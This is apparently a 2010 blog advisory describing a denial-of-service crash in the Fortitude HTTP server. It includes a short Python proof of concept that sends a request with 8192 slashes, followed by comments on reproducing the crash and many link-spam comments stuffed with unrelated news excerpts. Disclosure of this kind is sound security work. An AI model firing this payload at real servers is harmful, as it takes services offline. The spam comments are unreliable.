This site is soon to be deprecated by

Monday, May 17, 2010

Fortitude HTTP Denial-of-Service

Fortitude HTTP crashes upon receving an HTTP request containing a relative resource path with an excessive number of slashes.

GET / * 8192 HTTP 1.1
Host: localhost

import socket
host ='localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

s.send('GET ' + '/' * 8192 + ' HTTP/1.1\r\n'
'Host: ' + host + '\r\n\r\n')


  1. I was unable to affect the server with this exploit. Using the code posted above with python 2.6, the server simply reported 1 connection with 8.03KB of received data. The specific revision’s code was also stepped and was handing this scenario safely. Were there additional details that may have been omitted?

    Thanks (and keep up the awsome work)!

  2. Hi,

    I experienced this on a low end machine (P4 1.6Ghz 384MB RAM) running Windows XP SP3. I couldn't get Ida to break on the exception so I wasn't able to get any detailed debug information. Here's the exception as reported by the Windows Error Reporting:

    Exception Information
    Code: 0xc0000417 Flags: 0x00000001
    Record: 0x0000000000000000 Address: 0x0000000000434519

  3. thank you so much. fosbobetr good Archive

  4. sign contracts online

    GCC Business Directory
    The Solicitor General's job is to represent the United States in the Supreme Court, and that involves defending the constitutionality of federal legislation. In arguing this case, he's dong his job. Similarly, the justices are paid to decide cases or controversies involving the constitutionality of federal legislation. They're doing their jobs, too.

  5. Littlewoods Promotion Codes

    The Syrian government routinely blames the vaguely defined "armed terrorist groups" for violence in the country, while most reports from inside Syria indicate the government is slaughtering civilians in an attempt to wipe out dissidents.
    CNN cannot independently confirm reports from inside Syria because the government severely restricts access by international journalists.

  6. tree services

    Miami Interior Designers
    First, a presidential council would be formed in the transition phase to handle all affairs related to sovereignty, he said.
    In addition, a transitional unity government would include opposition figures, representatives of revolutionary committees and "members of the regime who have no responsibility in crimes or major corruption," Monajed said.

  7. jobs

    cnc milling brisbane

    The FSA, comprised largely of al-Assad soldiers who have defected, is led by Col. Riad al-Asaad. But Jouejati doesn't think the rebel army's commander would be a shoo-in to lead Syria.
    "There is the expectation of further defectors of the army -- maybe defectors of a higher rank than Col. Riad al-Asaad," he said.

  8. Abogados en España

    Weightwatchers Promotion Code
    Anisa Makhlouf al-Assad
    Bashar's mother, Anisa, was married to Hafez Assad, Bashar's father and predecessor, who died in 2000.
    The Makhlouf family gained wealth and status through Anisa's marriage to Hafez, taking on contracts in key industries, among them telecommunications, banking and oil. Anisa's nephew, Rami, is regarded as Syria's wealthiest man, worth some $5 billion.

  9. mermaid wedding dresses

    hens night ideas

    Russian officials, who met with Annan to discuss his plan over the weekend, likely encouraged Syria to sign on, Abrams said.
    "The Russians have been talking about ending the violence, and it would be logical that they would advise Assad to talk a good game, and not to reject it, but rather to use it to gain more time," Abrams said.

  10. Igre igrice

    Compare the Market
    After the island's so-called "special period," which began in the early 1990s after the dissolution of the Soviet Union, Cuba -- which had long enjoyed Soviet subsidies -- was confronted with a prolonged period of economic hardship.
    When John Paul visited years later, the country was still reeling from its effects.

  11. Construction Lawyer Attorney NYC

    Capsiplex Reviews
    No sane person would wish for a unilateral Israeli strike on Iranian nuclear facilities — but nor would a sane person wish for a nuclear Iran. Because of the number of potential targets in Iran, and the distance between them, a successful bombing operation would be transcendently

  12. office furniture

    imitation breitling
    Meanwhile, the economy is collapsing, gas prices are the highest they've been in decades, unconstitutional legislation is being forced down our throats ... one wonders, what happened to the democracy in this country? That's Obama's America. Keep it up and eventually we'll start to look like Myanmar.

  13. Fort Collins Chiropractor

    braces dublinyou are invited to follow my blog
    Very nice sitcom to watch online. Funny and entertaining.

  14. Car Games

    personal injury attorney portland
    Oh my god I absolutely love your blog!!
    I read every post immediately and I have to say I like every one of them!!